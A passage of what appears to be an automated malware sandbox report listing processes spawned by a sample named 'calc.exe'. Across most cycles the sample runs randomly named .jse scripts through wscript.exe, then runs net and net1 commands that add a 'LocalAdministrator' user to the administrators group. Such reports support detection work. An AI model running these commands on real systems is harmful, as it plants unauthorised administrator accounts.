Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" iTc0FWDklf.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	15:45:05
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	117
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	118
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	120
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	15:45:06
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	123
Start time:	15:45:07
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	124
Start time:	15:45:07
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	125
Start time:	15:45:07
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	126
Start time:	15:45:07
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	127
Start time:	15:45:08
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	128
Start time:	15:45:08
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	129
Start time:	15:45:08
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	130
Start time:	15:45:08
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	131
Start time:	15:45:08
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	132
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	133
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	134
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	135
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	136
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	137
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	138
Start time:	15:45:09
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	139
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" nmkcc07AEX.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	140
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	141
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	142
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	143
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	144
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	145
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	146
Start time:	15:45:10
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	147
Start time:	15:45:11
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" BqmogIcAUc.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	148
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	149
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	150
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	151
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	152
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	153
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	154
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	155
Start time:	15:45:12
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	156
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	157
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	158
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	159
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	160
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	161
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	162
Start time:	15:45:13
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	163
Start time:	15:45:14
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" PZr1luuECN.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	164
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	165
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	166
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	167
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	168
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	169
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	170
Start time:	15:45:15
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	171
Start time:	15:45:16
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	172
Start time:	15:45:17
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	173
Start time:	15:45:17
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	174
Start time:	15:45:17
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	175
Start time:	15:45:17
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	176
Start time:	15:45:17
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
